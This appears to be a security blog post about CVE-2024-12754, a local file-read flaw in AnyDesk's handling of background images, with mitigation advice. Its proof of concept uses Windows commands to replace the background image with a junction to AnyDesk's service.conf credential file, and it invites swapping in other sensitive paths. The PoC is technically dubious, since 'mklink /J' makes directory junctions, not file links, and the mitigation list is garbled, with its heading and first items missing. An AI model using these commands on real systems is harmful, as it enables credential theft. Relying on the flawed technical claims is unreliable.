AnyDesk is a widely-used remote desktop application trusted by millions across the world. However, CVE-2024-12754 highlights a serious information disclosure vulnerability in how AnyDesk handles “background images.” This post will break down the issue, show you a proof of concept, explain the impact, and provide ways to protect yourself.

What Is CVE-2024-12754?

CVE-2024-12754 lets a local attacker on the same computer as AnyDesk force the service to read sensitive files. The attacker must be able to run low-permission code, but doesn’t need full admin rights.

The problem was first reported as ZDI-CAN-23940 by the Zero Day Initiative ([link][1]). The issue is in how AnyDesk processes background images—it follows links (junctions) that shouldn’t be trusted. By tricking AnyDesk into reading a file of the attacker’s choosing, valuable information like stored credentials can be leaked.

Impact: Reading files like credential stores, passwords, or config files

- How: By creating a file “junction” (think: shortcut that looks like a file but is actually a link) where AnyDesk looks for background images

How Does The Exploit Work?

AnyDesk allows users to customize the background in their remote sessions by setting an image file. When AnyDesk fetches a background image, it does not properly check if the file path is safe or if it points somewhere unexpected.

Attack Steps

1. Attacker gets onto the target system (using any low-privilege method: a malicious user account, a dropped malware, etc).
2. Attacker creates a junction (symbolic link) in the folder where AnyDesk expects to find a background image.
3. The junction points to a sensitive file, e.g., AnyDesk’s own credential store, Windows password files, or anything else readable by the AnyDesk process.
4. AnyDesk tries to read the background image (due to normal operation or a forced refresh), but instead reads the attacker’s chosen file.

Proof of Concept (Code Snippet)

Let’s use Windows mklink to create a junction, exploiting the vulnerability for a file disclosure.

:: Step 1: Find where AnyDesk stores background images
cd "C:\Users\victim\AppData\Roaming\AnyDesk"

:: Step 2: Delete (or move) the original background image, if any.
del userimg.png

:: Step 3: Create a junction pointing to a sensitive file, e.g. the AnyDesk credentials
mklink /J userimg.png "C:\Users\victim\AppData\Roaming\AnyDesk\service.conf"

:: Step 4: Trigger AnyDesk to load the background image (e.g. start a remote session)
:: The contents of service.conf may now be leaked.

> Note: Replace service.conf with another sensitive file path to read other data!

References

- Zero Day Initiative’s advisory: ZDI-24-323: AnyDesk Service Arbitrary File Read Vulnerability
- AnyDesk Security Advisories: AnyDesk Security Portal
- NIST NVD Entry for CVE-2024-12754: NVD - CVE-2024-12754

Real-World Impact

With this exploit, a local attacker (think: malware, a sneaky user, or a limited initial breach) could pull out anything AnyDesk can read—even stored connection credentials to other machines, license files, or sensitive configuration data. This can turn a low-privilege foothold into full internal compromise if an admin’s credentials are stored.

Restrict Local Access: Limit who can log on, and monitor for unexpected new user accounts.

3. Use Application Sandboxing: Consider running remote desktop software in limited environments to stop lateral movement.
4. Monitor Background Image and Config Paths: Watch for unexpected file changes or links in the user’s AppData\AnyDesk folder.

Final Thoughts

Local vulnerabilities like CVE-2024-12754 don’t require an attacker to be a system administrator—just the means to drop and run code. The flaw’s simplicity makes old-school tricks like junction/symlink attacks dangerous in software not designed to handle them safely.

If your organization allows multiple users or software on critical PCs—especially those running remote access tools—always apply security updates promptly, and limit who can run what!


> Stay safe: keep software updated, monitor local activity, and review sensitive logs regularly!


*[1]: https://www.zerodayinitiative.com/advisories/ZDI-24-323/

Timeline

Published on: 12/30/2024 17:15:07 UTC